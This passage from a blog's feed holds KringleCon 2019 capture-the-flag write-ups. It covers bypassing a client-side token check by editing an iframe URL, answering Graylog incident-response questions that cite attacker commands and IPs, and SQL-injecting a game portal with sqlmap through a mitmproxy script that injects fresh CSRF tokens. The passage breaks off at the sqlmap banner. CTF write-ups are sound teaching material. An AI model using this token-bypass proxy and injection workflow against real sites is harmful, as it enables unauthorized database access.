&lt;p>Next, I notice that the elevator window is loaded into an &lt;code>iframe&lt;/code> with the address &lt;code>elevator.kringlecastle.com&lt;/code>. I proceed to investigate the JavaScript code that&amp;rsquo;s loaded and find the following interesting section:&lt;/p>
&lt;p>&lt;img src="../images/obj10/has-token-app.png" alt="Has-Token-App">&lt;/p>
&lt;p>This code makes an AJAX request in the background only if the button is &lt;code>powered&lt;/code> (the S4 stream is functional) and the &lt;code>besanta&lt;/code> token is present. Looking further into it I find the implementation of the &lt;code>hasToken()&lt;/code> check:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-javascript" data-lang="javascript">&lt;span class="c1">// --- code from conduit.js --- //
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="kr">const&lt;/span> &lt;span class="nx">__PARSE_URL_VARS__&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">()&lt;/span> &lt;span class="p">=&amp;gt;&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="kd">let&lt;/span> &lt;span class="nx">vars&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">{};&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">parts&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">window&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">location&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">href&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">replace&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="sr">/[?&amp;amp;]+([^=&amp;amp;]+)=([^&amp;amp;]*)/gi&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="kd">function&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">m&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="nx">key&lt;/span>&lt;span class="p">,&lt;/span>&lt;span class="nx">value&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">vars&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="nx">key&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">value&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="p">});&lt;/span>
&lt;span class="k">return&lt;/span> &lt;span class="nx">vars&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="c1">// --- code from app.js --- //
&lt;/span>&lt;span class="c1">&lt;/span>&lt;span class="kr">const&lt;/span> &lt;span class="nx">getParams&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">__PARSE_URL_VARS__&lt;/span>&lt;span class="p">();&lt;/span>
&lt;span class="kd">let&lt;/span> &lt;span class="nx">tokens&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">getParams&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">tokens&lt;/span> &lt;span class="o">||&lt;/span> &lt;span class="s1">&amp;#39;&amp;#39;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">split&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s1">&amp;#39;,&amp;#39;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="kr">const&lt;/span> &lt;span class="nx">hasToken&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">name&lt;/span> &lt;span class="p">=&amp;gt;&lt;/span> &lt;span class="nx">tokens&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">indexOf&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">name&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">!==&lt;/span> &lt;span class="o">-&lt;/span>&lt;span class="mi">1&lt;/span>&lt;span class="p">;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Basically, it parses all the URL parameters, then splits the comma-separated &lt;strong>tokens&lt;/strong> parameter into the &lt;strong>tokens&lt;/strong> array for later use. Looking further into the &lt;strong>iframe&lt;/strong> I find where the &lt;code>tokens&lt;/code> variable is populated and see that it contains &lt;code>besanta&lt;/code>, as I was looking at it in Santa mode:&lt;/p>
&lt;p>&lt;img src="../images/obj10/besanta-tokens.png" alt="SantaTokens-Iframe">&lt;/p>
&lt;p>It seems all I need to do is tweak the &lt;strong>iframe&lt;/strong> source to inject an extra &lt;code>besanta&lt;/code> string into the &lt;strong>tokens&lt;/strong> parameter while in non-Santa mode(!).&lt;/p>
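&lt;p>As a sanity check, the client-side logic can be reproduced offline. Below is a rough Python approximation of the parser and the &lt;code>hasToken()&lt;/code> check shown above; the URL is a made-up example, not the actual &lt;strong>iframe&lt;/strong> source:&lt;/p>

```python
import re

def parse_url_vars(url):
    """Rough Python port of __PARSE_URL_VARS__: grab every key=value pair."""
    return {m.group(1): m.group(2)
            for m in re.finditer(r"[?&]+([^=&]+)=([^&]*)", url)}

def has_token(tokens, name):
    # mirrors: tokens.indexOf(name) !== -1
    return name in tokens

# Hypothetical iframe URL with an extra 'besanta' appended to the tokens parameter
elevator_url = "https://elevator.kringlecastle.com/?tokens=marble,portals,besanta"
tokens = parse_url_vars(elevator_url).get("tokens", "").split(",")
print(has_token(tokens, "besanta"))  # True: the check the Santavator performs
```

&lt;p>Since the whole check runs in the browser and trusts the URL, nothing stops a visitor from supplying the token themselves.&lt;/p>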
&lt;p>The plan works, and I successfully impersonate 🎅🏻 and bypass the fingerprint reader to visit Santa&amp;rsquo;s office in disguise. While there I take a nice selfie just for fun:&lt;/p>
&lt;p>&lt;img src="../images/obj10/santa-office-selfie.png" alt="Selfie In Santa&amp;rsquo;s Office">&lt;/p>
&lt;p>On to the next one! 😎&lt;/p>
&lt;p>&lt;strong>PS&lt;/strong>: In this moment, when the above selfie is taken, I finally understand why I chose this funky face for my avatar &amp;hellip; 😛&lt;/p></description></item><item><title>Paper Scraps Hunting</title><link>https://flrnks.netlify.app/tutorials/kringlecon2019/objective9/</link><pubDate>Sat, 28 Dec 2019 00:00:00 +0100</pubDate><guid>https://flrnks.netlify.app/tutorials/kringlecon2019/objective9/</guid><description>&lt;h2 id="graylog-to-the-rescue">Graylog to the rescue&lt;/h2>
&lt;p>After solving the CAPTEHA and winning a lifetime supply of cookies for Krampus, he provided you with some further clues. He first pointed you to some paper scraps he found in the vents, which he collected by using the Turtle Doves&amp;hellip; Then he mentioned that he stored some scanned copies of the paper scraps on his server at: &lt;strong>studentportal.elfu.org&lt;/strong>. However, he forgot his access credentials, so he asked you to hack your way in and retrieve those images:&lt;/p>
&lt;blockquote>
&lt;p>Gain access to the data on the Student Portal server and retrieve the paper scraps hosted there.
What is the name of Santa&amp;rsquo;s cutting-edge sleigh guidance system?
For hints on achieving this objective, please visit the dorm and talk with Pepper Minstix.&lt;/p>
&lt;/blockquote>
&lt;p>If needed, you can get further hints by visiting Pepper Minstix in the dormitory. Luckily you don&amp;rsquo;t need to walk anymore, as Krampus updated your badge with new firmware that lets you teleport within the Elf University campus&amp;hellip; How cool is that!&lt;/p>
&lt;p>Once you talk with Minstix, he says he will help you out, but only after you help him with an issue he is facing:&lt;/p>
&lt;p>&lt;img src="../images/obj9-minstix.png" alt="Pepper Minstix in DORM">&lt;/p>
&lt;blockquote>
&lt;p>It&amp;rsquo;s me - Pepper Minstix.
Normally I&amp;rsquo;m jollier, but this Graylog has me a bit mystified.
Have you used Graylog before? It is a log management system based on Elasticsearch, MongoDB, and Scala.
Some Elf U computers were hacked, and I&amp;rsquo;ve been tasked with performing incident response.
Can you help me fill out the incident response report using our instance of Graylog?
It&amp;rsquo;s probably helpful if you know a few things about Graylog.
Event IDs and Sysmon are important too. Have you spent time with those?
Don&amp;rsquo;t worry - I&amp;rsquo;m sure you can figure this all out for me!
Click on the All messages Link to access the Graylog search interface!
Make sure you are searching in all messages!
The Elf U Graylog server has an integrated incident response reporting system. Just mouse-over the box in the lower-right corner.
Login with the username elfustudent and password elfustudent.&lt;/p>
&lt;/blockquote>
&lt;p>To solve this technical challenge, you need to get familiar with &lt;strong>Graylog&lt;/strong>. You can do this either via the in-game terminal or by browsing to &lt;strong>graylog.elfu.org&lt;/strong> in a new tab. In order to submit your answers though, you need to open the terminal and hover over the bottom right corner for the input forms to appear (also available at this
&lt;a href="https://report.elfu.org/" target="_blank" rel="noopener">link&lt;/a>). For information gathering it may be easier to navigate to the service in a separate browser tab.&lt;/p>
&lt;p>To get the hints, you will need to answer these 10 questions below:&lt;/p>
&lt;h4 id="q1---what-is-the-path-and-filename-of-the-first-malicious-file-downloaded-by-minty">Q1 - What is the path and filename of the first malicious file downloaded by Minty?&lt;/h4>
&lt;p>This can be easily found by searching for the username &lt;strong>minty&lt;/strong>, enabling the TargetFileName column and browsing through the log entries later in time (towards the end of all logs available). This will eventually lead you to the following answer: &lt;strong>C:\Users\minty\Downloads\cookie_recipe.exe&lt;/strong>.&lt;/p>
&lt;h4 id="q2---what-was-the-ipport-the-malicious-file-connected-to-first">Q2 - What was the ip:port the malicious file connected to first?&lt;/h4>
&lt;p>Within the same search results, enable the DestinationIpAddress and DestinationPort columns and look for values that seem anomalous. I found the IP &lt;strong>192.168.247.175&lt;/strong> and ports &lt;strong>4443&lt;/strong> and &lt;strong>4444&lt;/strong> that seemed out of the ordinary, so I tried them, and the combination &lt;strong>192.168.247.175:4444&lt;/strong> was accepted as the correct answer.&lt;/p>
&lt;h4 id="q3---what-was-the-first-command-executed-by-the-attacker">Q3 - What was the first command executed by the attacker?&lt;/h4>
&lt;p>If you examine the log entry right after the one providing the IP and port for the previous answer, you will see this CommandLine property: &lt;strong>C:\Windows\system32\cmd.exe /c &amp;ldquo;whoami &amp;ldquo;&lt;/strong>. It seems awfully suspicious, and indeed it holds the correct answer: &lt;strong>whoami&lt;/strong>.&lt;/p>
&lt;h4 id="q4---what-is-the-one-word-service-name-the-attacker-used-to-escalate-privileges">Q4 - What is the one-word service name the attacker used to escalate privileges?&lt;/h4>
&lt;p>To answer this I first had to Google how services can be started on Windows systems, and found that it is usually done by calling a command that starts like &lt;strong>sc start &amp;hellip;&lt;/strong>, so I searched the Graylog server for this string and found a lot of entries involving &lt;strong>webexservice&lt;/strong>, which was the correct answer.&lt;/p>
&lt;h4 id="q5---what-is-the-path--filename-of-the-binary-ran-by-the-attacker-to-dump-credentials">Q5 - What is the path &amp;amp; filename of the binary ran by the attacker to dump credentials?&lt;/h4>
&lt;p>For this question you should search for the text &lt;strong>exe&lt;/strong> and within the results look for the string &lt;strong>password&lt;/strong>. You should find a suspiciously named &lt;strong>.exe&lt;/strong> being called, which holds the correct answer: &lt;strong>C:\cookie.exe&lt;/strong>.&lt;/p>
&lt;h4 id="q6---which-account-name-was-used-to-pivot-to-another-machine">Q6 - Which account name was used to pivot to another machine?&lt;/h4>
&lt;p>To answer this, you should notice that not all log entries have the &lt;strong>AccountName&lt;/strong> value, so you should search for &lt;strong>&lt;em>exists&lt;/em>: AccountName&lt;/strong> which returns log entries where this value exists. In the results you will find &lt;strong>minty&lt;/strong> quite often but this would not be accepted, so try some others from the results, perhaps &lt;strong>alabaster&lt;/strong> will work&amp;hellip; :)&lt;/p>
&lt;h4 id="q7---what-is-the-time-hhmmss-the-attacker-makes-a-remote-desktop-connection-to-another-machine">Q7 - What is the time (HH:MM:SS) the attacker makes a Remote Desktop connection to another machine?&lt;/h4>
&lt;p>For this I had to learn that in a Windows environment, opening a remote connection via RDP generates an event with ID 4624 and LogonType 10, so I searched for these values in Graylog with &lt;strong>EventID: 4624 AND LogonType:10&lt;/strong> and found the correct timestamp to be: &lt;strong>06:04:28&lt;/strong>.&lt;/p>
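&lt;p>The query logic itself is simple to mirror offline. With some hypothetical sample records (made up purely for illustration), the search &lt;strong>EventID: 4624 AND LogonType:10&lt;/strong> amounts to the following filter:&lt;/p>

```python
# Hypothetical log records, only to illustrate what the Graylog query matches
records = [
    {"EventID": 4624, "LogonType": 10, "timestamp": "06:04:28"},
    {"EventID": 4624, "LogonType": 3,  "timestamp": "05:12:44"},
    {"EventID": 4688, "LogonType": 10, "timestamp": "05:30:01"},
]

# Keep only successful logons (4624) of type 10 (RemoteInteractive, i.e. RDP)
rdp_logons = [r for r in records
              if r["EventID"] == 4624 and r["LogonType"] == 10]
print(rdp_logons[0]["timestamp"])
```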
&lt;h4 id="q8---what-is-the-sourcehostnamedestinationhostnamelogontype-of-this-connection">Q8 - What is the &amp;lsquo;SourceHostName,DestinationHostname,LogonType&amp;rsquo; of this connection?&lt;/h4>
&lt;p>For answering this question, you should look for LogonType 3 and the existence of Source and Destination hostnames. I made the following search query: &lt;strong>LogonType: 3 AND &lt;em>exists&lt;/em>:SourceHostName AND &lt;em>exists&lt;/em>:DestinationHostname&lt;/strong> which gave the following solution: &lt;strong>ELFU-RES-WKS2,elfu-res-wks3,3&lt;/strong> (after several rounds of trial and error based on search results).&lt;/p>
&lt;h4 id="q9---what-is-the-path--filename-of-the-secret-document-being-transferred-from-the-third-host-to-the-second-host">Q9 - What is the path &amp;amp; filename of the secret document being transferred from the third host to the second host?&lt;/h4>
&lt;p>First you should look for the account &lt;strong>alabaster&lt;/strong>, because the attacker was operating under this account, then browse the results for a PDF file that seems suspicious. The correct answer is: &lt;strong>C:\Users\alabaster\Desktop\super_secret_elfu_research.pdf&lt;/strong>.&lt;/p>
&lt;h4 id="10---what-is-the-ipv4-address-the-secret-research-document-was-exfiltrated-to">10 - What is the IPv4 address the secret research document was exfiltrated to?&lt;/h4>
&lt;p>To answer this, I listed all log entries, went to the very end, and turned on the CommandLine and TargetIpAddress columns, which showed that a PowerShell command was used to upload this secret PDF to some website. This revealed the target IP address: &lt;strong>104.22.3.84&lt;/strong>.&lt;/p>
&lt;p>So now the questions are answered and Pepper is ready to share some useful hints:&lt;/p>
&lt;blockquote>
&lt;p>That&amp;rsquo;s it - hooray!
Have you had any luck retrieving scraps of paper from the Elf U server?
You might want to look into SQL injection techniques.
OWASP is always a good resource for web attacks.
For blind SQLi, I&amp;rsquo;ve heard Sqlmap is a great tool.
In certain circumstances though, you need custom tamper scripts to get things going!&lt;/p>
&lt;/blockquote>
&lt;h2 id="main-objective">Main objective&lt;/h2>
&lt;p>So Pepper Minstix hinted at the
&lt;a href="http://sqlmap.org/" target="_blank" rel="noopener">tool&lt;/a> called &lt;strong>sqlmap&lt;/strong> which can help us exploit vulnerable databases tied to web applications that accept input from the users. This is quite a valuable hint. Further information in the hint include:&lt;/p>
&lt;ul>
&lt;li>&lt;a href="https://www.youtube.com/watch?v=0T6-DQtzCgM&amp;amp;feature=youtu.be">https://www.youtube.com/watch?v=0T6-DQtzCgM&amp;amp;feature=youtu.be&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://www.owasp.org/index.php/SQL_Injection">https://www.owasp.org/index.php/SQL_Injection&lt;/a>&lt;/li>
&lt;li>&lt;a href="https://pen-testing.sans.org/blog/2017/10/13/sqlmap-tamper-scripts-for-the-win">https://pen-testing.sans.org/blog/2017/10/13/sqlmap-tamper-scripts-for-the-win&lt;/a>&lt;/li>
&lt;/ul>
&lt;p>&lt;img src="../images/obj9-portal.png" alt="Student portal">&lt;/p>
&lt;p>The given target (&lt;strong>studentportal.elfu.org&lt;/strong>) has several endpoints, which could be targeted with a Web App exploit:&lt;/p>
&lt;ul>
&lt;li>&lt;code>studentportal.elfu.org/index.php&lt;/code>&lt;/li>
&lt;li>&lt;code>studentportal.elfu.org/students.php&lt;/code>&lt;/li>
&lt;li>&lt;code>studentportal.elfu.org/apply.php&lt;/code>&lt;/li>
&lt;li>&lt;code>studentportal.elfu.org/check.php&lt;/code>&lt;/li>
&lt;/ul>
&lt;p>The first and the second do not accept any input, so they are not going to be very useful for this objective; however, &lt;strong>apply.php&lt;/strong> and &lt;strong>check.php&lt;/strong> do accept user input through HTML forms. Of these two, I first took a look at the latter, as it has only one input field, which is enough for the purpose. Do note that the HTML form on the &lt;strong>check.php&lt;/strong> page has a different target specified: &lt;strong>application-check.php&lt;/strong>, so the &lt;strong>sqlmap&lt;/strong> attack should be directed at this URL instead of &lt;strong>check.php&lt;/strong>.&lt;/p>
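&lt;p>In practice this means every probe is a plain GET against &lt;strong>application-check.php&lt;/strong> carrying an &lt;code>elfmail&lt;/code> and a &lt;code>token&lt;/code> parameter. A minimal sketch of how such a request URL is assembled (the token value here is a placeholder; the real one is fetched from &lt;code>validator.php&lt;/code>):&lt;/p>

```python
from urllib.parse import urlencode

BASE = "https://studentportal.elfu.org/application-check.php"

def build_check_url(elfmail, token):
    # The check.php form submits here, so injection payloads go into the
    # 'elfmail' parameter of this URL, not into check.php itself.
    return BASE + "?" + urlencode({"elfmail": elfmail, "token": token})

print(build_check_url("email@example.com", "PLACEHOLDER_TOKEN"))
```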
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-html" data-lang="html">&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">form&lt;/span> &lt;span class="na">id&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;check&amp;#34;&lt;/span> &lt;span class="na">action&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;/application-check.php&amp;#34;&lt;/span> &lt;span class="na">method&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;get&amp;#34;&lt;/span> &lt;span class="na">onsubmit&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;submitApplication()&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">h1&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>Check Application Status&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">h1&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">div&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">label&lt;/span> &lt;span class="na">for&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;inputEmail&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>Elf Mail Address&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">label&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">input&lt;/span> &lt;span class="na">name&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;elfmail&amp;#34;&lt;/span> &lt;span class="na">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;email&amp;#34;&lt;/span> &lt;span class="na">id&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;inputEmail&amp;#34;&lt;/span> &lt;span class="na">placeholder&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;Email address&amp;#34;&lt;/span> &lt;span class="na">required&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;&amp;#34;&lt;/span> &lt;span class="na">autofocus&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">div&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">input&lt;/span> &lt;span class="na">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;hidden&amp;#34;&lt;/span> &lt;span class="na">id&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;token&amp;#34;&lt;/span> &lt;span class="na">name&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;token&amp;#34;&lt;/span> &lt;span class="na">value&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">div&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;&lt;/span>&lt;span class="nt">input&lt;/span> &lt;span class="na">type&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;submit&amp;#34;&lt;/span> &lt;span class="na">value&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s">&amp;#34;Check Status&amp;#34;&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">div&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;span class="p">&amp;lt;/&lt;/span>&lt;span class="nt">form&lt;/span>&lt;span class="p">&amp;gt;&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>In the HTML source code, notice that the submission form also has a hidden field called &lt;strong>token&lt;/strong> that gets sent along with the request when the button is clicked. Searching a bit further in the page source you can see a short piece of JavaScript code which handles the update of this input field and the actual form submission:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-javascript" data-lang="javascript">&lt;span class="kd">function&lt;/span> &lt;span class="nx">submitApplication&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">console&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">log&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;Submitting&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="nx">elfSign&lt;/span>&lt;span class="p">();&lt;/span>
&lt;span class="nb">document&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">getElementById&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;check&amp;#34;&lt;/span>&lt;span class="p">).&lt;/span>&lt;span class="nx">submit&lt;/span>&lt;span class="p">();&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="kd">function&lt;/span> &lt;span class="nx">elfSign&lt;/span>&lt;span class="p">()&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="kd">var&lt;/span> &lt;span class="nx">s&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nb">document&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">getElementById&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;token&amp;#34;&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="kr">const&lt;/span> &lt;span class="nx">Http&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="k">new&lt;/span> &lt;span class="nx">XMLHttpRequest&lt;/span>&lt;span class="p">();&lt;/span>
&lt;span class="kr">const&lt;/span> &lt;span class="nx">url&lt;/span>&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;/validator.php&amp;#39;&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="nx">Http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">open&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;GET&amp;#34;&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="nx">url&lt;/span>&lt;span class="p">,&lt;/span> &lt;span class="kc">false&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="nx">http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">send&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="kc">null&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="k">if&lt;/span> &lt;span class="p">(&lt;/span>&lt;span class="nx">Http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">status&lt;/span> &lt;span class="o">===&lt;/span> &lt;span class="mi">200&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="p">{&lt;/span>
&lt;span class="nx">console&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">log&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="nx">Http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">responseText&lt;/span>&lt;span class="p">);&lt;/span>
&lt;span class="nx">s&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">value&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="nx">Http&lt;/span>&lt;span class="p">.&lt;/span>&lt;span class="nx">responseText&lt;/span>&lt;span class="p">;&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;span class="p">}&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>So now you know that when you run sqlmap against &lt;strong>elfmail&lt;/strong>, you also need to set up some kind of script that automatically fetches the token and inserts it into the requests, as they will be rejected otherwise. My first idea was to write a &lt;strong>tamper&lt;/strong> script for sqlmap, which defines a custom transformation that inserts the token into the payload of each request. However, I could not get this tamper script to work; I always received an &lt;strong>Invalid or expired token&lt;/strong> error for every request generated by sqlmap.&lt;/p>
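&lt;p>For reference, a tamper script along these lines is what I attempted. This is only a rough sketch, stripped of sqlmap&amp;rsquo;s own imports so it runs standalone; &lt;code>fetch_token()&lt;/code> is a stand-in for the HTTP GET to &lt;code>validator.php&lt;/code>:&lt;/p>

```python
# Sketch of a sqlmap tamper script (e.g. saved as token_tamper.py and passed
# via --tamper=token_tamper). A real one would also import PRIORITY from
# sqlmap's lib.core.enums; fetch_token() is a placeholder here.

__priority__ = 1

def dependencies():
    pass

def fetch_token():
    # placeholder for fetching https://studentportal.elfu.org/validator.php
    return "PLACEHOLDER_TOKEN"

def tamper(payload, **kwargs):
    # A tamper script only rewrites the injected payload itself, which may be
    # why tacking the token on here never satisfied the server for me.
    return payload + "&token=" + fetch_token() if payload else payload
```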
&lt;p>So next, I looked around on the net for an alternative solution, and found the &lt;strong>mitmproxy&lt;/strong>
&lt;a href="https://mitmproxy.org" target="_blank" rel="noopener">tool&lt;/a> which has a nice python API that helped with the token injection. The github repo for the &lt;strong>mitmproxy&lt;/strong> project has several useful
&lt;a href="https://github.com/mitmproxy/mitmproxy/blob/master/examples/simple/modify_querystring.py" target="_blank" rel="noopener">examples&lt;/a>, which helped me learn enough of the API to get going with the token injecting service. The script I used was very simple and easy to understand:&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-python" data-lang="python">&lt;span class="kn">from&lt;/span> &lt;span class="nn">mitmproxy&lt;/span> &lt;span class="kn">import&lt;/span> &lt;span class="n">http&lt;/span>
&lt;span class="kn">import&lt;/span> &lt;span class="nn">requests&lt;/span>
&lt;span class="k">def&lt;/span> &lt;span class="nf">request&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="n">flow&lt;/span>&lt;span class="p">:&lt;/span> &lt;span class="n">http&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">HTTPFlow&lt;/span>&lt;span class="p">)&lt;/span> &lt;span class="o">-&amp;gt;&lt;/span> &lt;span class="bp">None&lt;/span>&lt;span class="p">:&lt;/span>
&lt;span class="c1"># obtain the token from the validator.php endpoint&lt;/span>
&lt;span class="n">r&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">requests&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">get&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;https://studentportal.elfu.org/validator.php&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;span class="c1"># insert the token into the request that is intercepted by mitmproxy&lt;/span>
&lt;span class="n">flow&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">request&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">query&lt;/span>&lt;span class="p">[&lt;/span>&lt;span class="s2">&amp;#34;token&amp;#34;&lt;/span>&lt;span class="p">]&lt;/span> &lt;span class="o">=&lt;/span> &lt;span class="n">r&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">content&lt;/span>&lt;span class="o">.&lt;/span>&lt;span class="n">decode&lt;/span>&lt;span class="p">(&lt;/span>&lt;span class="s2">&amp;#34;utf-8&amp;#34;&lt;/span>&lt;span class="p">)&lt;/span>
&lt;/code>&lt;/pre>&lt;/div>&lt;p>Below is a sample screenshot of the &lt;strong>mitmproxy&lt;/strong> console when looking at a sample request that was already injected with the necessary token:&lt;/p>
&lt;p>&lt;img src="../images/obj9-mitmreq.png" alt="Student portal">&lt;/p>
&lt;p>Now that the proxy is set up (IP: &lt;strong>192.168.56.7&lt;/strong>, PORT: &lt;strong>8080&lt;/strong>), it was time to let sqlmap loose on the database and find some vulnerabilities. To start the scan you need to run the following command specifying the URL and the query parameter you want to exploit (which was &lt;strong>-p elfmail&lt;/strong> in this case):&lt;/p>
&lt;div class="highlight">&lt;pre class="chroma">&lt;code class="language-Bash" data-lang="Bash">~/sqlmap ▶ python sqlmap.py --proxy&lt;span class="o">=&lt;/span>&lt;span class="s1">&amp;#39;http://192.168.56.7:8080&amp;#39;&lt;/span> --url&lt;span class="o">=&lt;/span>&lt;span class="s2">&amp;#34;https://studentportal.elfu.org/application-check.php?elfmail=email@example.com&amp;#34;&lt;/span> -p elfmail -risk &lt;span class="m">3&lt;/span>
___
__H__
___ ___&lt;span class="o">[&lt;/span>.&lt;span class="o">]&lt;/span>_____ ___ ___ &lt;span class="o">{&lt;/span>1.3.12.34#dev&lt;span class="o">}&lt;/span>
&lt;span class="p">|&lt;/span>_ -&lt;span class="p">|&lt;/span> . &lt;span class="o">[(]&lt;/span> &lt;span class="p">|&lt;/span> .&lt;span class="s1">&amp;#39;| . |
&lt;/span>&lt;span class="s1">|___|_ [)]_|_|_|__,| _|
&lt;/span>&lt;span class="s1"> |_|V... |_| http://sqlmap.org
&lt;/span>&lt;span class="s1">
&lt;/span>&lt;span class="s1">[*] starting @ 10:40:06 /2020-01-01/
&lt;/span>&lt;span class="s1">
